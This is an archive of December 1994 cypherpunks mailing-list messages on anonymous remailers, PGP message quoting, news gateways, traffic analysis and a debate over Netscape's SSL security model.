when the technology allows it (real-time location monitoring is possible now). In the meantime, *obvious* video recording would also help protect officers in that some perps would think twice before killing someone *on camera*. ... Another great idea would be anonymous real-time monitoring of vital signs along with position data. Auto-911 if you will. We know somebody at this corner had a heart attack 5 minutes ago where is he? The developers of the localizer technology I mentioned in my article have anticipated you. Their equipment can do real-time vital sign monitoring. There are some obvious benefits for wired cops plus some subtle drawbacks for bad cops. (I leave discovery of said drawbacks as an exercise for the student.) S a n d y ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From cactus at seabsd.hks.net Mon Dec 12 11:42:28 1994 From: cactus at seabsd.hks.net (L. Todd Masco) Date: Mon, 12 Dec 94 11:42:28 PST Subject: News->Mail & CMU's Andrew Message System Message-ID: <199412121947.OAA22152@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- L. McCarthy wrote: >Is the AMS software (or some similar system) available as freeware or >shareware somewhere ? I'm considering the possibilities for anonymized >subscription to newsgroups through a mechanism like this. AMS is pretty strongly tied to AFS (now known as part of DCE) and is geared towards sites with users in the thousands. It's probably not what you want, even if it were available (CMU is in the process of phasing it out, since their user base usage has exceeded the design limitations of AMS). >Come to think of it, >many newsgroups are gatewayed to related mailing lists for readers on BBSes >and such; I need to search a bit for the software used to do this. Take a look at newsgate, available somewhere on ftp.uu.net. All you have to do is set up a pseudo-site in your news server's newsfeeds file and send the messages through news2mail. >I'm curious how such systems deal with cancellation messages; presumably they >would simply have to drop them. This would partially eliminate the threat of >spam-of-cancels attacks I mentioned earlier. It totally depends upon the configuration of the gateway and the format of the message. If your gateway passes Control: headers, then cancels will be forwarded to the user and perhaps even be effective if they have another mail-to-news gateway up (that allows Control: headers). Even more so for cancels of the "Subject: cmsg cancel" format, since everything passes Subject: headers. - -- Todd Masco | It's difficult to be loud about keeping your enumerated cactus at hks.net | rights when you're busy exercising your unenumerated ones. cactus at bb.com | http://www.hks.net/~cactus/cactus.html - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLuyoqSoZzwIn1bdtAQH4gQGAqbROjwEHW6VVYwawXtzeTitdkpWXoytC UNEMT8FPQ49MqbwWnWMJfZDY1CGZoRpU =Yrr9 -----END PGP SIGNATURE----- From mclow at coyote.csusm.edu Mon Dec 12 12:05:27 1994 From: mclow at coyote.csusm.edu (Marshall Clow) Date: Mon, 12 Dec 94 12:05:27 PST Subject: Misunderstanding of Remail Headers Message-ID: >At 2:13 AM 12/12/94, L. McCarthy wrote: >>Hal writes: >>> There was also a misperception that my remailer was an official effort >>> endorsed by Portal (again, despite the disclaimers). Note that it was >>> they who were contacted, not me (yet). This might suggest that it will >>> not be possible to cleanly separate the remailer operators and service >>> providers when problems like this arise. Both may end up being hassled >>> (time will tell whether I am). >> [ stuff deleted ] >The "From:" line seems to be confusing people. The author of the article >quoted from the Globe & Mail appearantly didn't even understand the >disclaimer. The article was worded in such a way to make it seem the >disclaimer was saying that Bob Rae didn't really write the message, as >opposed to saying that Hal Finney didn't really write the message! >Something needs to be done so that even the most internet clueless will >understand that the message _isn't_ from Finney or McCarthy or Joe Random >RemailerOp, which appearantly isn't clear to many people currently. While I'm all for having clear disclaimers, the facts remain: 1) You can't force people to read. 2) Even if you could, you can't force people to understand. Improve the disclaimers, sure. But don't think that this problem is going to go away because of it. -- Marshall (who has just blown his lurker status) :-) Marshall Clow Aladdin Systems mclow at san_marcos.csusm.edu From jamesd at netcom.com Mon Dec 12 12:14:04 1994 From: jamesd at netcom.com (James A. Donald) Date: Mon, 12 Dec 94 12:14:04 PST Subject: Crypto Declaration of Independance In-Reply-To: <9412121654.AA10520@snark.imsi.com> Message-ID: <199412122012.MAA27440@netcom4.netcom.com> Perry E. Metzger writes > Yup, just what we need -- more foaming at the mouth. I seem to recall that on the extropians list you did your fair share of foaming at the mouth. While it is true that getting security working and stardardized is right now a more urgent and more difficult task than foaming at the mouth, nonetheless more foaming at the mouth will be needed by and by. -- --------------------------------------------------------------------- We have the right to defend ourselves and our property, because of the kind of animals that we James A. Donald are. True law derives from this right, not from the arbitrary power of the omnipotent state. jamesd at netcom.com From db at Tadpole.COM Mon Dec 12 12:18:40 1994 From: db at Tadpole.COM (Doug Barnes) Date: Mon, 12 Dec 94 12:18:40 PST Subject: Broadcasts - addressing In-Reply-To: <199412121005.FAA16675@bb.hks.net> Message-ID: <9412122018.AA07956@tadpole.tadpole.com> I have been contemplating how to mark broadcast messages as being 'for' someone. To foil traffic analysis, you don't want to include their nym or key-id, for the sake of the your poor CPU, you want to avoid the need to attempt decryption on everything that passes through. My first thought on this is to standardize a way for marking messages with either the nym _or_ a one-time-address (a large random number). The sniffer would need to be loaded with lists of unused one-time- addresses, which could be given out in blocks to correspondents. The one-time-address method would obviously not work the first time you contacted a nym, but on further conversation it could significantly hamper traffic analysis and would also render the messages from X->Y unlinkable (if you were thinking of a "X's alias for Y is " approach.) This is just a first-order brainstorm, I'm curious what others have thought about this. Also... > In case the bandwidth on {alt.anonymous, alt.anonymous.messages} started to > bother news admins, we could actively encourage them to put the groups on > very short expiration periods, i.e. articles might expire after only a day. > Assuming people are using automated sniffers to collect their anonymous mail, > this shouldn't present any obstacle to the use of the groups as message pools. > Keeping the ciphertext around in public for a shorter time sounds like a > Good Thing (tm), anyway. > I agree that bandwidth seems essential to foiling traffic analysis. In order for there to be enough bandwidth to rival some of the really classic Usenet bandwidth hogs (e.g. alt.binaries.*), then there would likely be enough interest and bandwidth to come up with something that is less leveraged off of Usenet, or that mitigated the load. Remember, there are people sending sound and video around the net, not to mention the huge amount spent to move .GIFs from hither to yon. I think that you could make a case that experimenting with anonymous protocols is potentially a very worthwhile educational endeavor, possibly more so than some of the other common uses for the net, and that it is, by comparison, relatively low-bandwidth. I agree it can and should be expired quickly once the volume becomes significant. From strick at techwood.org Mon Dec 12 12:23:23 1994 From: strick at techwood.org (strick at techwood.org) Date: Mon, 12 Dec 94 12:23:23 PST Subject: (RFC934) Re: extra dashes in PGP-related blocks? In-Reply-To: Message-ID: <199412122021.MAA04027@gwarn.versant.com> THUS SPAKE jrochkin at cs.oberlin.edu (Jonathan Rochkind): # # Does anyone know what it is that's putting in these "- "s, why it's putting # them in, and how to stop it? They're part of RFC934 and they are the correct standard way to encapsulate messages inside messages, short of using MIME. Many mailers produce & handle these correctly. The extra "- " are due to "Character-Stuffing the Encapsulation Boundary". What you&we need is filters to extract encapsulations that unstuff nested encapsulations. Relevant excerpt from RFC934 follows. --strick -- -- -- Network Working Group Marshall T. Rose (Delaware) Request for Comments: 934 Einar A. Stefferud (NMA) January 1985 Proposed Standard for Message Encapsulation ... Message Encapsulation ... Definitions: a draft forwarding message consists of a header portion and a text portion. If the text portion is present, it is separated from the header portion by a blank line. Inside the text portion a certain character string sequence, known as an "encapsulation boundary", has special meaning. Currently (in existing digestification agents), an encapsulation boundary (EB) is defined as a line in the message which starts with a dash (decimal code 45, "-"). Initially, no restriction is placed on the length of the encapsulation boundary, or on the characters that follow the dash. ... 2.3. Encapsulated Messages Each encapsulated message is bounded by two EBs: a pre-EB, which occurs before the message; and, a post-EB, which occurs after the message. For two adjacent encapsulated messages, the post-EB of the first message is also the pre-EB of the second message. Consistent with this, two adjacent EBs with nothing between them should be treated as enclosing a null message, and thus two or more adjacent EBs are equivalent to one EB. ... Character-Stuffing the Encapsulation Boundary It should be noted that the protocol is general enough to support both general forwarding of messages and the specific case of digests. Unfortunately, there is one issue of message encapsulation which apparently is not addressed by any forwarding agent (to the authors' knowledge) in the ARPA-Internet: what action does the forwarding agent take when the encapsulation boundary occurs within a the text portion of a message being forwarded? Without exception, this circumstance is ignored by existing forwarding agents. To address this issue, this memo proposes the following character-stuffing scheme: the encapsulation boundary is defined as a line which starts with a dash. A special case is made for those boundaries which start with a dash and are followed by a space (decimal code 32, " "). During forwarding, if the forwarding agent detects a line in the text portion of a message being forwarded which starts with the encapsulation boundary, the forwarding agent outputs a dash followed by a space prior to outputting the line. During bursting, if the bursting agent detects an encapsulation boundary which starts with a dash followed by a space, then the bursting agent does not treat the line as an encapsulation boundary, and outputs the remainder of the line instead. This simple character-stuffing scheme permits recursive forwardings. ... -- -- -- strick <...!{ihnp4,akgua,allegra,gatech}!techwood.org!strick> echo '[q]sa[ln0=aln256%Pln256/snlbx]sb3135071790101768542287578439snlbxq'|dc --keithv at cs.berkeley.edu(?) -- From pierre at shell.portal.com Mon Dec 12 12:23:28 1994 From: pierre at shell.portal.com (Pierre Uszynski) Date: Mon, 12 Dec 94 12:23:28 PST Subject: Broadcasts and the Rendezvous Problem In-Reply-To: <199412112248.RAA25113@bb.hks.net> Message-ID: <199412122023.MAA15209@jobe.shell.portal.com> L. Todd Masco said: > [...] > bringing a new remailer on line could be achieved by broadcasting a message > through a newsgroup specifying the location and type of the remailer. If > necessary, one or more pseudonymous automatic testing agents could pick up > the message and put the remailer through a barrage of tests, broadcasting > a "remailer certification" with a certain duration. "Premail++" and > remailers could find their next hop by examining current certifications > and choosing one with desired characteristics, scoring by trusted testing > agents and other criteria (including the passage of time since the last > certification). > [...] > My question is whether this strikes anybody else as a > desirable design: we would end up with a net of remailers that is fairly > resilient and not dependent upon any one list of remailers. If a node > goes down, the net adjusts in rather short order and service is not > disrupted. Handling unreliable remailers is even more important if you want to encourage the "every-one-a-remailer" view. Numerous, low traffic, remailers will not be run professionally. I'd like to complete such a view of a remailer plan with: 1) Acknowledgements, or Bounces, or broadcast drop-ids: When a mail is sent through a chain of remailers, it should be dealt with reliably from the user perspective. That means either the user gets an ack that the message got there when they do, or the user gets a bounce when they don't. Either way he should know what to expect. You could do that with response blocks (but they themselves can fail), or you can do that by broadcasting the ids of messages that are dropped because the next node in a chain is down. An id is just a large random number. Again, here you can use a broadcast medium. This could also be achieved if the recipient's mailer filters out duplicate copies of messages: the sender's mailer would monitor the reviews of the remailers used in transit, and re-issue messages that came too close to a break in the chain. Nobody ever needs to look at all this info, it would be handled by your personal Premail++. 2) Amateur remailers need a flow control mechanism. You cannot expect somebody (or his internet provider) to be happy when his personal account remailer suddenly becomes the most popular in the current premail++ rating and gets flooded by everybody and his brother (randomizing premail++ or not). It does not need to be a very smooth or precise flow control, but it should be enough to prevent catastrophic events. Current systems tend to do that by refusing the mail, or dropping the packets on the floor, but we do not have this luck: the personal mail of the account holder must still go through. I do not know a good way to do that. Posting the remailer as being down when a flood occurs is too rash and too late. One way to do that would be for these "small" remailers to issue tickets (say 700 message tickets a week, each valid for the transport of one message). The remailer agent (premail++) of a remailer-net user who expects to use the net for around 15 messages a week would try to reserve, say, 6 tickets each from 20 "small" remailers (for chaining, and to account for "sold-out" remailers). In the message, with the info for each successive remailer, it would paste in a ticket (which is then spent.) But now some ticket distribution system is needed: ticket distribution could be done by the remailer itself, but then we would be back to a flooding problem. So ticket distribution is better handled by "seriously" run "ticketing agents", just like the review process is better done by "review agents". A "small" remailer would hand out a provision of tickets to a small set of "ticketing agents", and would post to the broadcast medium that it is up and that tickets can be obtained from this set of agents. A ticket is simply a short string of random numbers. They can be re-used fairly quickly by the "small" remailer (say used one week out of 4), as we are only trying to avoid fortuitous flooding, not criminal mail-bombing. Finally, I'd say that a well propagated Usenet News group is a convenient medium to do this on, but needs not be the only one considered. A not-so-well propagated broadcast can be reached by anybody's premail++ through yet a third set of robot mailers, advertised in an ad-hoc fashion, just like the remailers themselves now. I know this is a lot of different entities, but I firmly believe that (soon enough :-) nobody will use chained remailers manually, Premail is only the beginning. Pierre. pierre at shell.portal.com From fhalper at pilot.njin.net Mon Dec 12 12:26:23 1994 From: fhalper at pilot.njin.net (Frederic Halper) Date: Mon, 12 Dec 94 12:26:23 PST Subject: remailer list Message-ID: <9412122026.AA04890@pilot.njin.net> What's the ftp site where I can obtain the latest copy of the list of remailers? Thanks, -RH- --------------------------------------------------------------------------------- Reuben Halper I'm not growing up, I'm just burnin' out." Montclair High - Green Day - Montclair, NJ E-mail: fhalper at pilot.njin.net PGP 2.6ui Public Key available upon request --------------------------------------------------------------------------------- From kipp at warp.mcom.com Mon Dec 12 12:33:49 1994 From: kipp at warp.mcom.com (Kipp E.B. Hickman) Date: Mon, 12 Dec 94 12:33:49 PST Subject: Clarification of my remarks about Netscape Message-ID: <9412121231.ZM17395@warp.mcom.com> In article <9412111620.AA41983 at eldamar.walker.org>, you write: > Several people have asked me to clarify my recent comments about Netscape. > I am more than happy to oblige. > > First of all, let me begin by saying that I am a biased observer, and that > all of this is my personal opinion. My annoyance with Netscape is also closer > to the surface this week than it normally is, due to a variety of factors > (including having just returned from the San Jose IETF meeting). My initial > comment, and the ones that follow in this message, are thus more frank than is > my usual style on, say, public Usenet newsgroups. > > That being said, here are some of the data that has gone into my impressions > of Netscape so far. > > (1) Netscape plays very fast and loose with HTML. Rather than participating > in the existing standardization efforts, they have indiscriminately added > "extensions" to it that are not supported by any other client software, > and which in some cases go directly against HTML's markup-oriented > structure. This only adds more confusion to an already muddy area, > delays the prospects for a standard HTML specification, and divides the > WWW into "WWW Classic" and "Netscape-compatible". Personally, as a > strong proponent of universal interoperability, I find this reprehensible. > There is no need to bypass existing efforts just to add cosmetic value to > your own software. This has nothing to do with security... > (2) The Netscape Secure Sockets proposal has an extremely poor security model. > It is not an end-to-end security model, but rather relies on transport > level security, which is in my view dangerously inadequate for reasons > which should be obvious to most of the folks on this list. Clearly I'm an idiot. Explain it to me. And while you are at it, why don't you email me your comments on the spec? I put my email address in there for that very reason. Jeesh. > It is also > tied directly to the RSA certification hierarchy. Now, for those of us > who have X.509 certificates rooted in the RSA Commercial Certification > authority, that's fine, but it also means that any other WWW client that > wishes to interoperate with Netscape's "secure servers" must license > TIPEM from RSA Data Security, and consequently pay RSA's rather high > royalties, unless the software is free (in which case RSAREF can be used). > This serves as a direct barrier to competition from other commercial > vendors. This is not all bad--I happen to like RSADSI's products and > technology--but promoting a transport-level security system instead of > an end-to-end one is to my mind simply irresponsible. This is an outright lie. We don't use TIPEM. You could build a conformant SSL implementation using RSAREF and the freeware IDEA cipher code. As for a barrier to competition. So what else is new? We all have barriers to overcome before we can compete. Should we get rid of TCP/IP as a barrier to using the web? > There has been no peer review of Netscape's security model--it was simply > implemented by fiat, without regard for the IETF standards process. I > find that this leaves a very bad taste in my mouth. I also heard similar > sentiments from a wide variety of other attendees at the IETF, including > members of the IP Security working group, people who attended the Secure > HTTP BOF, and others. This leads me to believe that it's not just a > matter of me leaping to wild conclusions. You are somewhat right here. In fact, this was done because we are a company interested in surviving long enough to withstand the eventual attack by microsoft. Instead of waiting several years before anything was agreed upon and ending up with a kitchen sink protocol as all others these days do, we took a simpler approach. And instead of hiding in a closet with it, we brought it out to light. As a result we received critical review from some decent members of the crypto community, including: Martin Abadi Mike Burrows Alan Schiffman Matt Robshaw Burt Kaliski to name a few. As for the IETF standards process, we are pushing the document into the RFC process. > (3) Netscape is viewed as a "loose cannon" by most of the other commercial > players in the WWW arena, mainly because they have introduced a fair > amount of FUD into the HTML standardization effort, while simultaneously > promoting themselves as being standards-based. Members of Apple's > "Cyberdog" project and Microsoft's web projects, who *are* trying to > contribute to the standards process, had particularly excoriating things > to say in this regard. This is a matter of opinion. However, I believe that our opinions don't matter in the long run because of the 800 pound gorilla Microsoft. They will push something out, it will be proprietary, and they will name the tune and ask us to play along. Now we can either just sit back in our current comfy cozy standards based processes and languish for a few years, and then SIGH and say "Gee wasn't that fun, too bad microsoft shoved yet another piece of excrement down our throats" or we can be "loose cannons", get something out there, try it out and see what happens. The market will decide one way or the other. > Now, as I said, I am biased and my comments about Netscape are strictly my > person opinions. I will be perfectly willing to revise these opinions as I > receive more data. For example, if Netscape takes a more active part in > the standards process, works with RSA to secure wider availability of the > underlying technology required by their proposals, and generally demonstrates > a willingness to play nicely with other children, that would be great, and > I'll just as strongly defend them as I am panning them now. > > However, in my view, they have not shown a good initial track record. > Only time will tell. > > > Amanda Walker > InterCon Systems Corporation > > --------------------------------------------------------------------- Kipp E.B. Hickman Netscape Communications Corp. kipp at mcom.com http://www.mcom.com/people/kipp/index.html -- --------------------------------------------------------------------- Kipp E.B. Hickman Netscape Communications Corp. kipp at mcom.com http://www.mcom.com/people/kipp/index.html From hfinney at shell.portal.com Mon Dec 12 12:40:29 1994 From: hfinney at shell.portal.com (Hal) Date: Mon, 12 Dec 94 12:40:29 PST Subject: Misunderstanding of Remail Headers In-Reply-To: Message-ID: <199412122040.MAA17924@jobe.shell.portal.com> -----BEGIN PGP SIGNED MESSAGE----- jrochkin at cs.oberlin.edu (Jonathan Rochkind) writes: >quoted from the Globe & Mail appearantly didn't even understand the >disclaimer. The article was worded in such a way to make it seem the >disclaimer was saying that Bob Rae didn't really write the message, as >opposed to saying that Hal Finney didn't really write the message! >Something needs to be done so that even the most internet clueless will >understand that the message _isn't_ from Finney or McCarthy or Joe Random >RemailerOp, which appearantly isn't clear to many people currently. There was some discussion here last week about remailers which don't let users put in "From:" lines. This case shows a good reason not to allow them. "Reply-To:" should be used to force a reply to some anonymous return address if you have one. So perhaps filtering "From:" is a good idea. Hal -----BEGIN PGP SIGNATURE----- Version: 2.6 iQBVAwUBLuy1ChnMLJtOy9MBAQHYNAH9EDJe3vzIV1DI/7IoZ7q+8eQZCSCMZ6GT +5onVqzTyvm02ijSQLsqLg8WohnZCKTlt9bK/JCh63idT+Bc3KoRPg== =K+kq -----END PGP SIGNATURE----- From perry at imsi.com Mon Dec 12 12:57:55 1994 From: perry at imsi.com (Perry E. Metzger) Date: Mon, 12 Dec 94 12:57:55 PST Subject: Crypto Declaration of Independance In-Reply-To: <199412122012.MAA27440@netcom4.netcom.com> Message-ID: <9412122057.AA10994@snark.imsi.com> James A. Donald says: > While it is true that getting security working and > stardardized is right now a more urgent and more > difficult task than foaming at the mouth, nonetheless > more foaming at the mouth will be needed by and by. To what end? Perhaps strong logical argumentation is worthwhile. What is the point of useless rants that will never be read? .pm From sandfort at crl.com Mon Dec 12 12:58:20 1994 From: sandfort at crl.com (Sandy Sandfort) Date: Mon, 12 Dec 94 12:58:20 PST Subject: Real-time surveillance of the police Message-ID: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SANDY SANDFORT . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . C'punks, Don Doumakes wrote: ... why on earth would the police, who will not consent to civilian review, ever go along with something orders of magnitude more extreme? (1) There are civilian review boards; the consent of the police is not a prerequisite. If they don't like it, they can get a real job. (2) It is in their best interests to be protected from false accusations, and to be able to be quickly located under emergency conditions. ObCrypto/Privacy: I suspect there would be an immense amount of radio traffic involved in keeping track of a substantial group of people ... [I doubt] the ability of the receivers to digest it all in real time. (1) My suggestion was for (probably local) recording, not real time monitoring of video; therefore, no bandwidth problems. (2) Tim might want to comment, but my understanding of the localizer technology is that it too is somewhat "local" and that polling or burst transmission keeps the bandwidth requirements at manageable levels. S a n d y ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From jamesd at netcom.com Mon Dec 12 13:17:46 1994 From: jamesd at netcom.com (James A. Donald) Date: Mon, 12 Dec 94 13:17:46 PST Subject: Crypto Declaration of Independance In-Reply-To: <199412120906.DAA09468@jpunix.com> Message-ID: <199412122116.NAA05404@netcom4.netcom.com> Anonymous writes > I have a proposal for you all. > > I have started work on a Crypto Declaration of Independence, based on the > famous American work which represents Independence. This is unwise and unnecessary. It is unwise because we do not wish to alert the government to the fact that the net is largely ungoverned and ungovernable. It is unnecessary because crypto is already covered by various existing declarations on rights. THE BILL OF RIGHTS Amendment I Congress shall make no law [...] abridging the freedom of speech, or of the press; or the right of the people peaceably to assemble,[...] Amendment II [...] the right of the people to keep and bear arms, shall not be infringed. Amendment IV The right of the people to be secure in their persons, houses, papers, and effects, against unreasonable searches and seizures, shall not be violated,[...] -- --------------------------------------------------------------------- We have the right to defend ourselves and our property, because of the kind of animals that we James A. Donald are. True law derives from this right, not from the arbitrary power of the omnipotent state. jamesd at netcom.com From perry at imsi.com Mon Dec 12 13:19:10 1994 From: perry at imsi.com (Perry E. Metzger) Date: Mon, 12 Dec 94 13:19:10 PST Subject: Clarification of my remarks about Netscape In-Reply-To: <9412121231.ZM17395@warp.mcom.com> Message-ID: <9412122118.AA11047@snark.imsi.com> "Kipp E.B. Hickman" says: > > (1) Netscape plays very fast and loose with HTML. > > This has nothing to do with security... No, but its a Bad Thing. > > (2) The Netscape Secure Sockets proposal has an extremely poor security > > model. > > It is not an end-to-end security model, but rather relies on transport > > level security, which is in my view dangerously inadequate for reasons > > which should be obvious to most of the folks on this list. > > Clearly I'm an idiot. Explain it to me. And while you are at it, why > don't you email me your comments on the spec? HTTP, like SMTP, is only a transport for underlying documents. The underlying documents are the things people wish to secure, not the transport layer. By securing only the transport, you make it possible for people to get pages that are forged, although they can be sure of what machine delivered them (which isn't significant). Your system is, for instance, useless in a proxy HTTP daemon environment. Actually, securing the communications as well is important for privacy, but that should be done via IPSP, not some new, incompatible, mechanism. > > It is also > > tied directly to the RSA certification hierarchy. I'll point out that X.509 is widely loathed in the internet community -- its X.509 that caused PEM to fall flat on its face and die. > This is an outright lie. We don't use TIPEM. You could build a > conformant SSL implementation using RSAREF and the freeware IDEA > cipher code. As for a barrier to competition. RSAREF versions of the code can't be used commercially. RSA won't license people to do stuff on their own -- unless you have significant pull, you have to buy TIPEM or BSAFE from them and use THEIR code. > So what else is new? We > all have barriers to overcome before we can compete. Should we get rid of > TCP/IP as a barrier to using the web? Well, TCP/IP is available for free, but thats a horse of a different color. I don't particularly like your security model, but I don't object that strenuously to your use of TIPEM qua TIPEM. I do strongly object to X.509, which is based on technologies entirely alien to the internet. How do I look up an X.509 certificate in the DNS? Now, given the Eastlake and Kaufman DNS security system, you can put keys in the DNS if you use DNS names, but X.509 uses abortive ISO distinguished names which are utterly unmappable into the DNS. As for your "peer review", I'll note that it was done extensively by RSADSI folks, who aren't entirely unbiased about technologies... .pm From adam at bwh.harvard.edu Mon Dec 12 13:27:39 1994 From: adam at bwh.harvard.edu (Adam Shostack) Date: Mon, 12 Dec 94 13:27:39 PST Subject: Broadcasts - addressing In-Reply-To: <9412122018.AA07956@tadpole.tadpole.com> Message-ID: <199412122127.QAA21293@bwnmr5.bwh.harvard.edu> | | I have been contemplating how to mark broadcast messages as being | 'for' someone. To foil traffic analysis, you don't want to include | their nym or key-id, for the sake of the your poor CPU, you want to | avoid the need to attempt decryption on everything that passes through. Keys are cheap. Everyone should have a bunch. To foil TA, hand out a key to each correspondant. Give them id's like 'latex.limb.malaise ' Adam -- "It is seldom that liberty of any kind is lost all at once." -Hume From warlord at MIT.EDU Mon Dec 12 13:28:00 1994 From: warlord at MIT.EDU (Derek Atkins) Date: Mon, 12 Dec 94 13:28:00 PST Subject: alt.anonymous.messages propagation In-Reply-To: <199412120834.DAA04343@bb.hks.net> Message-ID: <9412122127.AA17019@hodge-podge.MIT.EDU> -----BEGIN PGP SIGNED MESSAGE----- To: cactus at seabsd.hks.net (L. Todd Masco) cc: cypherpunks at toad.com Subject: Re: alt.anonymous.messages propagation Hi. > Nope, no alt.anonymous. 'Leastaways, not off the servers that the turist > accounts use. And since I configured news on the machine, I'd love to > hear if there are MIT servers that have a larger set than life.ai's. I just looked on news.mit.edu and bloom-beacon.mit.edu (the MIT news-transport machine), and I found both alt.anonymous and alt.anonymous.messages, so I don't think saying "MIT doesn't get alt.anonymous" is at all correct. It may be correct to say that "GNU.AI.MIT.EDU doesn't get alt.anonymous", but GNU is _NOT_ MIT! - -derek for the News.MIT.EDU maintainers! :-) -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQBuAwUBLuy/5zh0K1zBsGrxAQGb9gLDBZPtRM9tJrgdLp4VwV7Du7fpECIFPYn2 pqXt34MG/kqsN4oo9+YQC89tZz0SshYb83N9QwWemukebN+9cyFvKZbxdzcOjXmj 5bztgIpFd++xX1KdIdi++N8= =2SFX -----END PGP SIGNATURE----- From andy at ithaca.com Mon Dec 12 13:38:11 1994 From: andy at ithaca.com (Andrew Purshottam) Date: Mon, 12 Dec 94 13:38:11 PST Subject: Children's Books Mentioning Privacy In-Reply-To: <941211145500_3311823@aol.com> Message-ID: <9412122006.AA01485@meefun.ithaca.com> It's not exactly a children's book, but may be classified as a "juvenile" novel and is the young peoples' room in the berkeley public library. but I read it as a 5th grader, and it made a deep impression on me: _The Currents of Space_ by Isaac Asimov. A small subplot in it concerns setting of alarms by requesting a library book on a forbidden subject. Another book that has probably interested many young people in privacy tech is the Zim book on codes and secret writing. I read it in grade school, and I seem to recall reading that Diffe did too. Author: Asimov, Isaac, 1920- Title: The currents of space / Isaac Asimov. 1st Ballantine Books ed. New York : Ballantine Books, 1983. Description: 231 p. ; 18 cm. Series: A Galactic Empire novel. A Del Rey book. Ballantine ; 31195. Del Rey science fiction. Notes: Cover art by Darrell K. Sweet. Other entries: Sweet, Darrell. Author: Zim, Herbert Spencer, 1909- Title: Codes and secret writing. New York, William Morrow, 1948. Description: [i-vi] 1-154p. illus., diagrs. 20.3 cm. Notes: "Books worth knowing": p. 144-145. Bound in orange cloth; stamped in brown. Dust jacket. Library of the American Cryptogram Association (George C. Lamb Collection). Subjects: Cryptography. Call numbers: UCB Ed/Psych Z104 .Z5 Children's Lit. Coll. From warlord at MIT.EDU Mon Dec 12 13:47:43 1994 From: warlord at MIT.EDU (Derek Atkins) Date: Mon, 12 Dec 94 13:47:43 PST Subject: extra dashes in PGP-related blocks? In-Reply-To: <9412121933.AA04137@nottingham.riskdev.ml.com> Message-ID: <9412122147.AA17081@hodge-podge.MIT.EDU> -----BEGIN PGP SIGNED MESSAGE----- To: andrew at riskdev.ml.com (Andrew Brown) cc: jrochkin at cs.oberlin.edu (Jonathan Rochkind), cypherpunks at toad.com Subject: Re: extra dashes in PGP-related blocks? > >> From: Jonathan Rochkind > > > >When people have been posting their public keys, or encrypted address > >blocks, to various lists I'm on, all of the "-----BEGIN whatever..." lines > >seem to have a "- " preppended to them. So, for instance, they look like: > > > >- -----BEGIN PGP MESSAGE----- > >Version: 2.6.2 > >[stuff] > >- -----END PGP MESSAGE----- > > pgp is putting those extra "- " pieces in (guess you didn't read all > your pgp docs :-), it does that so that it can tell the difference between > pgp begin/end blocks and other stuff, kinda like sendmail "quoting" lines > beginning with a dot with an extra dot. the difference here is that > sendmail removes any leading dots before delivery and pgp doesn't after > removing a signature. yeah, you do have to load it into an editor but > mailing something to a remailer shoud not "hork" it. the pgp running on > the remailer will just "- " the stuff and include it literally. Uhh, this is not at all true. When PGP verifies a message, it will strip out the quoting dashes in the output. This is documented in RFC 822 (I think) about quoting messages. Just run the message through PGP and it will strip out the first level of quoting in the output message, and you should be able to then run PGP on the rest of the message as well. This is not a bug, it is a feature to let PGP know *WHAT* was being signed, so that nested PGP clearsigned-messages don't interfere with each other. If it didn't quote, then if I wanted to clearsign a PGP message, the output would look something like: - -----BEGIN PGP SIGNED MESSAGE----- stuff here - -----BEGIN PGP SIGNED MESSAGE----- more stuff here - -----BEGIN PGP SIGNATURE----- inside signature - -----END PGP SIGNATURE----- - -----BEGIN PGP SIGNATURE----- outside signature - -----END PGP SIGNATURE----- If you have this, how do you deal with it? This is the same as the paranteses-matching-problem: If you are trying to match opens with closes, you have the problem that you could always have so many opens that you overrun your counter before you get to any closes! So, PGP uses the RFC-822 quoting mechanism to quote internal messages. This is perfectly legal. As for MIME: If you are using PGP to secure MIME objects, you should take the _OUTPUT_ from PGP and send that back into the MIME reader. MIME should NOT be going inside the PGP block. So, the behavior you are seeing is perfectly reasonable for a broken mail-reader! Fix your mail reader to run the PGP-secured message through PGP, and then run the output through MIME, and you will be fine! Enjoy! - -derek Derek Atkins, SB '93 MIT EE, G MIT Media Laboratory Member, MIT Student Information Processing Board (SIPB) Home page: http://www.mit.edu:8001/people/warlord/home_page.html warlord at MIT.EDU PP-ASEL N1NWH PGP key available -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQBuAwUBLuzEuDh0K1zBsGrxAQFcUgLDB1WGn7TQTf4+8FgYyszcNHgcMQTcVd3w aTXunh0K7vPjos4JkVl4p5MQkNICjDxNC2KkgQkxeIs7Yy8VgaACSwIfhDrxs3+K gMalhp2FHO3S/ZvnIo7RSmk= =btQx -----END PGP SIGNATURE----- From kipp at warp.mcom.com Mon Dec 12 13:59:36 1994 From: kipp at warp.mcom.com (Kipp E.B. Hickman) Date: Mon, 12 Dec 94 13:59:36 PST Subject: Clarification of my remarks about Netscape In-Reply-To: <9412122118.AA11047@snark.imsi.com> Message-ID: <9412121357.ZM17505@warp.mcom.com> On Dec 12, 4:18pm, Perry E. Metzger wrote: > Subject: Re: Clarification of my remarks about Netscape > > "Kipp E.B. Hickman" says: > > > (1) Netscape plays very fast and loose with HTML. > > > > This has nothing to do with security... > > No, but its a Bad Thing. > > > > (2) The Netscape Secure Sockets proposal has an extremely poor security > > > model. > > > It is not an end-to-end security model, but rather relies on transport > > > level security, which is in my view dangerously inadequate for reasons > > > which should be obvious to most of the folks on this list. > > > > Clearly I'm an idiot. Explain it to me. And while you are at it, why > > don't you email me your comments on the spec? > > HTTP, like SMTP, is only a transport for underlying documents. The > underlying documents are the things people wish to secure, not the > transport layer. By securing only the transport, you make it possible > for people to get pages that are forged, although they can be sure of > what machine delivered them (which isn't significant). Your system is, > for instance, useless in a proxy HTTP daemon environment. > > Actually, securing the communications as well is important for > privacy, but that should be done via IPSP, not some new, incompatible, > mechanism. I disagree compeltely. First of all, lets start with "not wanting to secure the transport layer". Right now email, passwords, etc. 